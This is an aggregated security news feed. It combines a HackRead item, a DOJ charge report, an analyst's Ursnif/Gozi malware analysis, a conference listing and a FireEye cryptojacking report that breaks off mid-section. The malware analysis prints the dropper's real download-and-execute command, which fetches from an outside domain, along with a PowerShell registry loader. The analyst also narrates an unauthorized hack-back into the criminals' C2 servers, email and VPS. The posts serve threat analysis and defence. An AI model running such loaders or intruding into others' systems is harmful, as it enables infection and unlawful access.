This is a post from HackRead.com Read the original post: Teen arrested for DDoS attack on ProtonMail & making fake bomb threats

U.S. Charges North Korean Spy Over WannaCry and Sony Pictures Hack

The U.S. Department of Justice announces criminal charges against a North Korean government spy in connection with the 2017 global WannaCry ransomware attack and the 2014 Sony Pictures Entertainment hack. According to multiple government officials cited by the NY Times who are familiar with the indictment, the charges would be brought against Park Jin Hyok, who works for North Korean military

Hacking The Hacker. Stopping a big botnet targeting USA, Canada and Italy

Today I'd like to share a full path analysis including a KickBack attack which took me to gain full access to an entire Ursniff/Gozi BotNet .

  In other words:  from a simple "Malware Sample" to "Pwn the Attacker Infrastructure".

NB: Federal Police has already been alerted on such a topic as well as National and International CERTs/CSIRT (on August 26/27 2018) . Attacked companies and compromised hosts should be already reached out. If you have no idea about this topic until now it means, with high probability, you/your company is not involved on that threat. I am not going to public disclose the victims IPs. 

This disclosure follows the ethical disclosure procedure, which it is close to responsible disclosure procedure but mainly focused on incident rather than on vulnerabilities.

Since blogging is not my business, I do write on my personal blog to share knowledge on Cyber Security, I will describe some of the main steps that took me to own the attacker infrastructure. I will no disclose the found Malware code nor the Malware Command and Control code nor details on attacker's group, since I wont put on future attackers new Malware source code ready to be used.

My entire "Cyber adventure" began from a simple email within a .ZIP file named "Nuovo Documento1.zip" as an apparently normal attachment (sha256: 79005f3a6aeb96fec7f3f9e812e1f199202e813c82d254b8cc3f621ea1372041) . Inside the ZIP a .VBS file (sha265: 42a7b1ecb39db95a9df1fc8a57e7b16a5ae88659e57b92904ac1fe7cc81acc0d) which for the time being August 21 2018 was totally unknown from VirusTotal (unknown = not yet analysed) was ready to get started through double click. The VisualBasic Script (Stage1) was heavily obfuscated in order to avoid simple reverse engineering analyses on it, but I do like  de-obfuscate hidden code (every time it's like a personal challenge). After some hardworking-minutes ( :D ) Stage1 was totally de-obfuscated and ready to be interpreted in plain text. It appeared clear to me that Stage1 was in charged of evading three main AVs such as: Kaspersky Lab, Panda Security and Trend Micro by running simple scans on Microsoft Regedit and dropping and executing additional software.

Stage1. Obfuscation
Indeed if none of searched AV were found on the target system Stage1 was acting as a simple downloader. The specific performed actions follows:
"C:\Windows\System32\cmd.exe" /c bitsadmin /transfer msd5 /priority foreground http://englandlistings.com/pagverd75.php C:\Users\J8913~1.SEA\AppData\Local\Temp/rEOuvWkRP.exe &schtasks /create /st 01:36 /sc once /tn srx3 /tr C:\Users\J8913~1.SEA\AppData\Local\Temp/rEOuvWkRP.exe
Stage1 was dropping and executing a brand new PE file named: rEOuvWkRP.exe (sha256: 92f59c431fbf79bf23cff65d0c4787d0b9e223493edc51a4bbd3c88a5b30b05c) using the bitsadmin.exe native Microsoft program. BitsAdmin.exe is a command-line tool that system admin can use to create download or upload jobs and monitor their progress over time. This technique have been widely used by Anunak APT during bank frauds on the past few years.

The Stage2 analysis (huge step ahead here)  brought me to an additional brand new Drop and Decrypt stager. Stage3 introduced additional layers of anti-reverse engineering. The following image shows the additional PE section within high entropy on it. It's a significative indication of a Decrypter activity.

Stage2. Drop and Decrypt the Stage3. You might appreciate the high Entropy on added section

Indeed Stage 3 (sha256: 84f3a18c5a0dd9af884293a1260dce1b88fc0b743202258ca1097d14a3c9d08e) was packed as well. A UPX algorithm was used to hide the real payload in such a way many AV engines were not able to detect it since signature was changing from original payload. Finally the de-packed payload presented many interesting features; for example it was weaponised with evasion techniques such as: timing delay (through sleep), loop delay by calling 9979141 times GetSystemTimeAsFileTime API, BIOS versioning harvesting, system manufacturer information and system fingerprinting to check if it was running on virtual or physical environment. It installed itself on windows auto-run registry to get persistence on the victim machine. The following action was performed while running in background flag:
cmd.exe /C powershell invoke-expression([System.Text.Encoding]::ASCII.GetString((get-itemproperty 'HKCU:\Software\AppDataLow\Software\Microsoft\4CA108BF-3B6C-5EF4-2540-9F72297443C6').Audibrkr))

The final payload executed the following commands and spawned two main services (WSearch, WerSvc) on the target.
"C:\Users\J8913~1.SEA\AppData\Local\Temp\2e6d628189703d9ad4db9e9d164775bd.exe"
C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
\\?\C:\Windows\system32\wbem\WMIADAP.EXE wmiadap.exe /F /T /R
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:209921 /prefetch:2
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:406536 /prefetch:2
C:\Windows\system32\rundll32.exe C:\Windows\system32\inetcpl.cpl,ClearMyTracksByProcess Flags:264 WinX:0 WinY:0 IEFrame:0000000000000000
C:\Windows\system32\rundll32.exe C:\Windows\system32\inetcpl.cpl,ClearMyTracksByProcess Flags:65800 WinX:0 WinY:0 IEFrame:0000000000000000
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3004 CREDAT:209921 /prefetch:2
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3004 CREDAT:144390 /prefetch:2
C:\Windows\system32\SearchIndexer.exe /Embedding
taskhost.exe SYSTEM
C:\Windows\System32\wsqmcons.exe
taskhost.exe $(Arg0)
C:\Windows\System32\svchost.exe -k WerSvcGroup
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe1_ Global\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
"C:\Windows\system32\SearchFilterHost.exe" 0 552 556 564 65536 560
"C:\Windows\sysWow64\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11082_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11082 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"  "1"
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11083_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11083 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"  "1"
"C:\Windows\sysWow64\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11084_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11084 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"  "1"
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe5_ Global\UsGthrCtrlFltPipeMssGthrPipe5 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
"C:\Windows\sysWow64\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11086_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11086 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"  "1"
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11087_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11087 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"  "1"
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe8_ Global\UsGthrCtrlFltPipeMssGthrPipe8 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:592 CREDAT:209921 /prefetch:2
cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\J8913~1.SEA\AppData\Local\Temp\34B0.bi1"
cmd /C "echo -------- >> C:\Users\J8913~1.SEA\AppData\Local\Temp\34B0.bi1"
C:\Windows\system32\schtasks.exe /delete /f /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader"
C:\Windows\system32\WerFault.exe -u -p 2524 -s 288
"C:\Windows\system32\wermgr.exe" "-queuereporting_svc" "C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_taskhost.exe_82b9a110b3b94c55171865162b471ffb8fadc7c6_cab_0ab86b12"
nslookup  myip.opendns.com resolver1.opendns.com

Stage3 finally connects back to C2s once checked its own ip address. Two main C2s were observed:

    • C2 level_1 (for domains and ips check the IoC section). The Stage3 connects back to C2 level_1 to get weaponised. Level_1 Command and Controls get information on victims and deliver plugins to expand the infection functionalities.
    • C2 level_2 (for domains and ips check the IoC section). Stage 3 indirectly connects to C2 level_2 in order to give stolen information. It 's a Ursniff/Gozi and it exfiltrates user credentials by looking for specific files, getting user clipboard and  by performing main in the browser attack against main web sites such as: paypal gmail, microsoft and many online services.

So far so good. Everything looks like one of my usual analyses, but something got my attention. The C2 level_1 had an administration panel which, on my personal point of view, was "hand made" and pretty "young" as implementation by meaning of HTML with not client side controls, no clickjacking controls and not special login tokens. According to Yoroi's mission (to defend its customers) I decided to go further and try to defend people and/or infected companies by getting inside the entire network and  to collaborate to local authorities to shut them down, by getting as much information as possible in order to help federal and local police to fight the Cyber Crime.

Fortunately I spotted a file inclusion vulnerability in Command and Control which took me in ! The following image shows a reverse shell I spawned on Attacker's command and control.

Reverse Shell On C2 Stage_1

Now, I was able to download the entire Command and Control Source Code (php) and study it ! The study of this brand new C2  took me to the next level. First of all I was able to get access to the local database where I found a lot of infected IPs (the IPs which were communicating back to C2 level_1). The following image proves that the downloaded Command and Control system has Macedonian dialect (Cyrillic language) on it, according to Anunak APT report made by group-ib.

Command and Control Source Code (snip)
The following image represents a simple screenshot of the database dump within Victim IPs (which are undisclosed for privacy reasons).

C2 level_1 Database 

Additional investigations on database brought new connected IPs. Those IPs were querying the MySQL with administrative rights. At least additional two layers of C2 were present. While the level_1 was weaponising the malware implant the level_2 was collecting information from victims. Thanks to the source code study has been possibile to found more 0Days to be used against C2 and in order to break into the C2 level_2 . Now I was able to see encrypted URLs coming from infected hosts.  Important steps ahead are intentionally missing. Among many URLs the analyst was able to figure out a "test" connection from the Attacker and focus to decrypt such a connection. Fortunately everything needed was written on command and control source code. In the specific case the following function was fundamental to get to clear text !

URL Decryption Function
The eKey was straight on the DB and the decryption function was quite easy to reverse. Finally it was possible to figured out how to decrypt the attacker testing string (the first transaction available on logs) and voilà, it was possible to checkin in attacker's email :D !

Attacker eMail: VPS credentials
Once "in" a new need came: discovering the entire network by getting access to the VPS control panel. After some active steps directly on the attacker infrastructure it was possible to get access to the entire VPS control panel. At this point it was clear the general infrastructure picture* and how to block the threat, not only for customers but for everybody !

Attacker VPS Environment

Sharing these results for free would make vendors (for example: AV companies, Firewall companies, IDS companies and son on) able to update their signatures and to block such a threat for everybody all around the world. I am sure that this work would not block malicious actors, BUT at least we might rise our voice against cyber criminals ! 

Summary:
In this post I described the main steps that took me to gain access to a big Ursniff/Gozi Botnet in order to shut it down by alerting federal and national authorities (no direct destructive actions have been performed on attacker infrastructure). The threat appeared very well structured, Docker containers were adopted in order to automatise the malicious infrastructure deployment and the code was quite well engineered. Many layers of command and control were found and the entire infrastructure was probably set up from a criminal organisation and not from a single person.

The following graph shows the victim distribution on August 2018. The main targets currently are USA with a 47% of the victims, followed by Canada (29.3%) and Italy (7.3%). Total victims on August 2018 are several thousands.


Victims Distribution on August 24 2018

During the analyses was interesting to observe attacker was acquiring domains from an apparent "black market"where many actors where selling and buying "apparent compromised domains" (no evidence on this last sentence, only feeling). The system (following picture) looks like a trading platform within public API that third party systems can operate such as stock operators.

Apparent Domain BlackMarket

Hope you enjoyed the reading.


IoCs:
Following a list of interesting artefacts that would be helpful to block and prevent the described threat.

Hashes:
  • 42a7b1ecb39db95a9df1fc8a57e7b16a5ae88659e57b92904ac1fe7cc81acc0d (.vbs)
  • 79005f3a6aeb96fec7f3f9e812e1f199202e813c82d254b8cc3f621ea1372041 (Nuovo Documento1.zip)
  • 92f59c431fbf79bf23cff65d0c4787d0b9e223493edc51a4bbd3c88a5b30b05c (rEOuvWkRP.exe)
  • 84f3a18c5a0dd9af884293a1260dce1b88fc0b743202258ca1097d14a3c9d08e (Stage 3.exe)
Windows Services Names:
  • WSearch
  • WerSvc
Involved eMails:
  • 890808977777@mail.ru
  • willi12s@post.com
Involved IPs:
  • 198[.]54[.]116[.]126 (Dropper Stage 2)
  • 195[.]123[.]237[.]123 (C2 level_1)
  • 185[.]212[.]47[.]9 (C2 level_1)
  • 52[.]151[.]62[.]5 (C2 level_1)
  • 185[.]154[.]53[.]185 (C2 level_1)
  • 185[.]212[.]44[.]209 (C2 level_1)
  • 195[.]123[.]237[.]123 (C2 level_1)
  • 185[.]158[.]251[.]173 (General Netwok DB)
  • 185[.]183[.]162[.]92 (Orchestrator CPANEL)

Involved Domains:
  • http://englandlistings[.]com/pagverd75.php (Dropper Stage 2)
  • https://pool[.]jfklandscape[.]com  (C2 level_1)
  • https://pool[.]thefutureiskids[.]com (C2 level_1)
  • https://next[.]gardenforyou[.]org (C2 level_1)
  • https://1000numbers[.]com (C2 level_1)
  • https://batterygator[.]com (C2 level_1)
  • https://beard-style[.]com (C2 level_1)
  • https://pomidom[.]com (C2 level_1)
  • http://upsvarizones.space/ (C2 level_1)
  • http://romanikustop.space/ (C2 level_1)
  • http://sssloop.host/ (C2 level_1)
  • http://sssloop.space/ (C2 level_1)
  • http://securitytransit.site/ (Orchestrator CPANEL)

*Actually it was not the whole network, a couple of external systems were investigated as well.

Upcoming cybersecurity events featuring BH Consulting

Here is a summary of upcoming cybersecurity events, conferences, webinars and training programmes where BH Consulting staff will deliver presentations about issues relating to cybersecurity, data protection, GDPR, and privacy. Each listing includes links for more information and registration.

BSides Belfast 2018: 27 September

BH Consulting is sponsoring the Belfast edition of the popular BSides security conference, which is now in its third year. As ever, the event will feature a mix of discussions, demos and talks from local and international experts. The conference will take place at the Europa Hotel. Check the event website for updates on speakers and presentations, along with a review of previous years. There is a nominal fee of £10 per ticket and you can book via this link.

COSAC and the SABSA World Congress: Naas, 30 September-4 October

Valerie Lyons will speak about leading information security teams at the COSAC World Congress at Killashee Hotel in Naas, Co Kildare. Now in its 25th year, the information security symposium it includes the SABSA World Congress. The event prohibits any sales content, and focuses purely on practicing professionals sharing their experience and debating issues. For more details, and registration options, visit here.

Filling the cybersecurity skills gap: Dublin, 3 October

This is a half-day event taking place at the Irish Management Institute on Wednesday October 3. The sessions will feature a mix of industry speakers along with three workshops aimed at improving understanding of cybersecurity and risk at senior management and board level. BH Consulting’s Brian Honan will deliver a talk about the current security threats facing industry. He will also suggest ways in which a broad-based skills initiative could reduce the impact of cybercrime. The event is free to attend but registration is essential. Visit this page for details and a booking link.

IP EXPO Europe: London, 3-4 October

Brian Honan will deliver a keynote at IP EXPO Europe, which takes place in London this October. The event comprises multiple tracks including one dedicated to cybersecurity. In his presentation, Brian will look at how car safety has evolved and how cybersecurity needs to do the same. For more details about the two-day conference, and to book tickets, go to the IP EXPO website.

BruCON: Brussels, 3-5 October

Once again, BH Consulting is delighted to sponsor BruCON. The organisers describe their event as for security researchers, hackers, nerds and other beings with a creative and critical view of life. The conference runs for three days in the Belgian capital. More details and a link to buy tickets are available here

Dublin Information Sec 2018: 15 October

Brian Honan is among a host of prominent security commentators lined up to present at this annual conference. The agenda promises to cover a range of topics, from regulations like GDPR to emerging security problems, and gauging your organisation’s security to looking at new technology with potential use for security. The all-day conference will take place on Monday 15 October at the RDS. Visit here for details and ticket booking.

IRISSCON: Dublin, 22 November

The tenth annual IRISSCERT Cyber Crime Conference has one of its strongest lineups yet. Confirmed speakers include Wendy Nather, Dave Lewis, Andrew Hay, Jack Daniel, Javvad Malik, Martijn Grooten, Quentyn Taylor, Robert McArdle and Eoin Keary. IRISSCON will take place at the Ballsbridge Hotel on Thursday 22 November, running all day. Staff from BH Consulting will be there on the day. Check the conference website for more updates. Tickets cost just €50 and you can book via this link.

The post Upcoming cybersecurity events featuring BH Consulting appeared first on BH Consulting.

How the Rise of Cryptocurrencies Is Shaping the Cyber Crime Landscape: The Growth of Miners

Introduction

Cyber criminals tend to favor cryptocurrencies because they provide a certain level of anonymity and can be easily monetized. This interest has increased in recent years, stemming far beyond the desire to simply use cryptocurrencies as a method of payment for illicit tools and services. Many actors have also attempted to capitalize on the growing popularity of cryptocurrencies, and subsequent rising price, by conducting various operations aimed at them. These operations include malicious cryptocurrency mining (also referred to as cryptojacking), the collection of cryptocurrency wallet credentials, extortion activity, and the targeting of cryptocurrency exchanges.

This blog post discusses the various trends that we have been observing related to cryptojacking activity, including cryptojacking modules being added to popular malware families, an increase in drive-by cryptomining attacks, the use of mobile apps containing cryptojacking code, cryptojacking as a threat to critical infrastructure, and observed distribution mechanisms.

What Is Mining?

As transactions occur on a blockchain, those transactions must be validated and propagated across the network. As computers connected to the blockchain network (aka nodes) validate and propagate the transactions across the network, the miners include those transactions into "blocks" so that they can be added onto the chain. Each block is cryptographically hashed, and must include the hash of the previous block, thus forming the "chain" in blockchain. In order for miners to compute the complex hashing of each valid block, they must use a machine's computational resources. The more blocks that are mined, the more resource-intensive solving the hash becomes. To overcome this, and accelerate the mining process, many miners will join collections of computers called "pools" that work together to calculate the block hashes. The more computational resources a pool harnesses, the greater the pool's chance of mining a new block. When a new block is mined, the pool's participants are rewarded with coins. Figure 1 illustrates the roles miners play in the blockchain network.


Figure 1: The role of miners

Underground Interest

FireEye iSIGHT Intelligence has identified eCrime actor interest in cryptocurrency mining-related topics dating back to at least 2009 within underground communities. Keywords that yielded significant volumes include miner, cryptonight, stratum, xmrig, and cpuminer. While searches for certain keywords fail to provide context, the frequency of these cryptocurrency mining-related keywords shows a sharp increase in conversations beginning in 2017 (Figure 2). It is probable that at least a subset of actors prefer cryptojacking over other types of financially motivated operations due to the perception that it does not attract as much attention from law enforcement.


Figure 2: Underground keyword mentions

Monero Is King

The majority of recent cryptojacking operations have overwhelmingly focused on mining Monero, an open-source cryptocurrency based on the CryptoNote protocol, as a fork of Bytecoin. Unlike many cryptocurrencies, Monero uses a unique technology called "ring signatures," which shuffles users' public keys to eliminate the possibility of identifying a particular user, ensuring it is untraceable. Monero also employs a protocol that generates multiple, unique single-use addresses that can only be associated with the payment recipient and are unfeasible to be revealed through blockchain analysis, ensuring that Monero transactions are unable to be linked while also being cryptographically secure.

The Monero blockchain also uses what's called a "memory-hard" hashing algorithm called CryptoNight and, unlike Bitcoin's SHA-256 algorithm, it deters application-specific integrated circuit (ASIC) chip mining. This feature is critical to the Monero developers and allows for CPU mining to remain feasible and profitable. Due to these inherent privacy-focused features and CPU-mining profitability, Monero has become an attractive option for cyber criminals.

Underground Advertisements for Miners

Because most miner utilities are small, open-sourced tools, many criminals rely on crypters. Crypters are tools that employ encryption, obfuscation, and code manipulation techniques to keep their tools and malware fully undetectable (FUD). Table 1 highlights some of the most commonly repurposed Monero miner utilities.

XMR Mining Utilities

XMR-STACK

MINERGATE

XMRMINER

CCMINER

XMRIG

CLAYMORE

SGMINER

CAST XMR

LUKMINER

CPUMINER-MULTI

Table 1: Commonly used Monero miner utilities

The following are sample advertisements for miner utilities commonly observed in underground forums and markets. Advertisements typically range from stand-alone miner utilities to those bundled with other functions, such as credential harvesters, remote administration tool (RAT) behavior, USB spreaders, and distributed denial-of-service (DDoS) capabilities.

Sample Advertisement #1 (Smart Miner + Builder)

In early April 2018, actor "Mon£y" was observed by FireEye iSIGHT Intelligence selling a Monero miner for $80 USD – payable via Bitcoin, Bitcoin Cash, Ether, Litecoin, or Monero – that included unlimited builds, free automatic updates, and 24/7 support. The tool, dubbed Monero Madness (Figure 3), featured a setting called Madness Mode that configures the miner to only run when the infected machine is idle for at least 60 seconds. This allows the miner to work at its full potential without running the risk of being identified by the user. According to the actor, Monero Madness also provides the following features:

  • Unlimited builds
  • Builder GUI (Figure 4)
  • Written in AutoIT (no dependencies)
  • FUD
  • Safer error handling
  • Uses most recent XMRig code
  • Customizable pool/port
  • Packed with UPX
  • Works on all Windows OS (32- and 64-bit)
  • Madness Mode option


Figure 3: Monero Madness


Figure 4: Monero Madness builder

Sample Advertisement #2 (Miner + Telegram Bot Builder)

In March 2018, FireEye iSIGHT Intelligence observed actor "kent9876" advertising a Monero cryptocurrency miner called Goldig Miner (Figure 5). The actor requested payment of $23 USD for either CPU or GPU build or $50 USD for both. Payments could be made with Bitcoin, Ether, Litecoin, Dash, or PayPal. The miner ostensibly offers the following features:

  • Written in C/C++
  • Build size is small (about 100–150 kB)
  • Hides miner process from popular task managers
  • Can run without Administrator privileges (user-mode)
  • Auto-update ability
  • All data encoded with 256-bit key
  • Access to Telegram bot-builder
  • Lifetime support (24/7) via Telegram


Figure 5: Goldig Miner advertisement

Sample Advertisement #3 (Miner + Credential Stealer)

In March 2018, FireEye iSIGHT Intelligence observed actor "TH3FR3D" offering a tool dubbed Felix (Figure 6) that combines a cryptocurrency miner and credential stealer. The actor requested payment of $50 USD payable via Bitcoin or Ether. According to the advertisement, the Felix tool boasted the following features:

  • Written in C# (Version 1.0.1.0)
  • Browser stealer for all major browsers (cookies, saved passwords, auto-fill)
  • Monero miner (uses minergate.com pool by default, but can be configured)
  • Filezilla stealer
  • Desktop file grabber (.txt and more)
  • Can download and execute files
  • Update ability
  • USB spreader functionality
  • PHP web panel


Figure 6: Felix HTTP

Sample Advertisement #4 (Miner + RAT)

In January 2018, FireEye iSIGHT Intelligence observed actor "ups" selling a miner for any Cryptonight-based cryptocurrency (e.g., Monero and Dashcoin) for either Linux or Windows operating systems. In addition to being a miner, the tool allegedly provides local privilege escalation through the CVE-2016-0099 exploit, can download and execute remote files, and receive commands. Buyers could purchase the Windows or Linux tool for €200 EUR, or €325 EUR for both the Linux and Windows builds, payable via Monero, bitcoin, ether, or dash. According to the actor, the tool offered the following:

Windows Build Specifics

  • Written in C++ (no dependencies)
  • Miner component based on XMRig
  • Easy cryptor and VPS hosting options
  • Web panel (Figure 7)
  • Uses TLS for secured communication
  • Download and execute
  • Auto-update ability
  • Cleanup routine
  • Receive remote commands
  • Perform privilege escalation
  • Features "game mode" (mining stops if user plays game)
  • Proxy feature (based on XMRig)
  • Support (for €20/month)
  • Kills other miners from list
  • Hidden from TaskManager
  • Configurable pool, coin, and wallet (via panel)
  • Can mine the following Cryptonight-based coins:
    • Monero
    • Bytecoin
    • Electroneum
    • DigitalNote
    • Karbowanec
    • Sumokoin
    • Fantomcoin
    • Dinastycoin
    • Dashcoin
    • LeviarCoin
    • BipCoin
    • QuazarCoin
    • Bitcedi

Linux Build Specifics

  • Issues running on Linux servers (higher performance on desktop OS)
  • Compatible with AMD64 processors on Ubuntu, Debian, Mint (support for CentOS later)


Figure 7: Miner bot web panel

Sample Advertisement #5 (Miner + USB Spreader + DDoS Tool)

In August 2017, actor "MeatyBanana" was observed by FireEye iSIGHT Intelligence selling a Monero miner utility that included the ability to download and execute files and perform DDoS attacks. The actor offered the software for $30 USD, payable via Bitcoin. Ostensibly, the tool works with CPUs only and offers the following features:

  • Configurable miner pool and port (default to minergate)
  • Compatible with both 64- and 86-bit Windows OS
  • Hides from the following popular task managers:
  • Windows Task Manager
  • Process Killer
  • KillProcess
  • System Explorer
  • Process Explorer
  • AnVir
  • Process Hacker
  • Masked as a system driver
  • Does not require administrator privileges
  • No dependencies
  • Registry persistence mechanism
  • Ability to perform "tasks" (download and execute files, navigate to a site, and perform DDoS)
  • USB spreader
  • Support after purchase

The Cost of Cryptojacking

The presence of mining software on a network can generate costs on three fronts as the miner surreptitiously allocates resources:

  1. Degradation in system performance
  2. Increased cost in electricity
  3. Potential exposure of security holes

Cryptojacking targets computer processing power, which can lead to high CPU load and degraded performance. In extreme cases, CPU overload may even cause the operating system to crash. Infected machines may also attempt to infect neighboring machines and therefore generate large amounts of traffic that can overload victims' computer networks.

In the case of operational technology (OT) networks, the consequences could be severe. Supervisory control and data acquisition/industrial control systems (SCADA/ICS) environments predominately rely on decades-old hardware and low-bandwidth networks, therefore even a slight increase in CPU load or the network could leave industrial infrastructures unresponsive, impeding operators from interacting with the controlled process in real-time.

The electricity cost, measured in kilowatt hour (kWh), is dependent upon several factors: how often the malicious miner software is configured to run, how many threads it's configured to use while running, and the number of machines mining on the victim's network. The cost per kWh is also highly variable and depends on geolocation. For example, security researchers who ran Coinhive on a machine for 24 hours found that the electrical consumption was 1.212kWh. They estimated that this equated to electrical costs per month of $10.50 USD in the United States, $5.45 USD in Singapore, and $12.30 USD in Germany.

Cryptojacking can also highlight often overlooked security holes in a company's network. Organizations infected with cryptomining malware are also likely vulnerable to more severe exploits and attacks, ranging from ransomware to ICS-specific malware such as TRITON.

Cryptocurrency Miner Distribution Techniques

In order to maximize profits, cyber criminals widely disseminate their miners using various techniques such as incorporating cryptojacking modules into existing botnets, drive-by cryptomining attacks, the use of mobile apps containing cryptojacking code, and distributing cryptojacking utilities via spam and self-propagating utilities. Threat actors can use cryptojacking to affect numerous devices and secretly siphon their computing power. Some of the most commonly observed devices targeted by these cryptojacking schemes are:

  • User endpoint machines
  • Enterprise servers
  • Websites
  • Mobile devices
  • Industrial control systems
Cryptojacking in the Cloud

Private sector companies and governments alike are increasingly moving their data and applications to the cloud, and cyber threat groups have been moving with them. Recently, there have been various reports of actors conducting cryptocurrency mining operations specifically targeting cloud infrastructure. Cloud infrastructure is increasingly a target for cryptojacking operations because it offers actors an attack surface with large amounts of processing power in an environment where CPU usage and electricity costs are already expected to be high, thus allowing their operations to potentially go unnoticed. We assess with high confidence that threat actors will continue to target enterprise cloud networks in efforts to harness their collective computational resources for the foreseeable future.

The following are some real-world examples of cryptojacking in the cloud:

  • In February 2018, FireEye researchers published a blog detailing various techniques actors used in order to deliver malicious miner payloads (specifically to vulnerable Oracle servers) by abusing CVE-2017-10271. Refer to our blog post for more detailed information regarding the post-exploitation and pre-mining dissemination techniques used in those campaigns.
  • In March 2018, Bleeping Computer reported on the trend of cryptocurrency mining campaigns moving to the cloud via vulnerable Docker and Kubernetes applications, which are two software tools used by developers to help scale a company's cloud infrastructure. In most cases, successful attacks occur due to misconfigured applications and/or weak security controls and passwords.
  • In February 2018, Bleeping Computer also reported on hackers who breached Tesla's cloud servers to mine Monero. Attackers identified a Kubernetes console that was not password protected, allowing them to discover login credentials for the broader Tesla Amazon Web services (AWS) S3 cloud environment. Once the attackers gained access to the AWS environment via the harvested credentials, they effectively launched their cryptojacking operations.
  • Reports of cryptojacking activity due to misconfigured AWS S3 cloud storage buckets have also been observed, as was the case in the LA Times online compromise in February 2018. The presence of vulnerable AWS S3 buckets allows anyone on the internet to access and change hosted content, including the ability to inject mining scripts or other malicious software.
Incorporation of Cryptojacking into Existing Botnets

FireEye iSIGHT Intelligence has observed multiple prominent botnets such as Dridex and Trickbot incorporate cryptocurrency mining into their existing operations. Many of these families are modular in nature and have the ability to download and execute remote files, thus allowing the operators to easily turn their infections into cryptojacking bots. While these operations have traditionally been aimed at credential theft (particularly of banking credentials), adding mining modules or downloading secondary mining payloads provides the operators another avenue to generate additional revenue with little effort. This is especially true in cases where the victims were deemed unprofitable or have already been exploited in the original scheme.

The following are some real-world examples of cryptojacking being incorporated into existing botnets:

  • In early February 2018, FireEye iSIGHT Intelligence observed Dridex botnet ID 2040 download a Monero cryptocurrency miner based on the open-source XMRig miner.
  • On Feb. 12, 2018, FireEye iSIGHT Intelligence observed the banking malware IcedID injecting Monero-mining JavaScript into webpages for specific, targeted URLs. The IcedID injects launched an anonymous miner using the mining code from Coinhive's AuthedMine.
  • In late 2017, Bleeping Computer reported that security researchers with Radware observed the hacking group CodeFork leveraging the popular downloader Andromeda (aka Gamarue) to distribute a miner module to their existing botnets.
  • In late 2017, FireEye researchers observed Trickbot operators deploy a new module named "testWormDLL" that is a statically compiled copy of the popular XMRig Monero miner.
  • On Aug. 29, 2017, Security Week reported on a variant of the popular Neutrino banking Trojan, including a Monero miner module. According to their reporting, the new variant no longer aims at stealing bank card data, but instead is limited to downloading and executing modules from a remote server.

Drive-By Cryptojacking

In-Browser

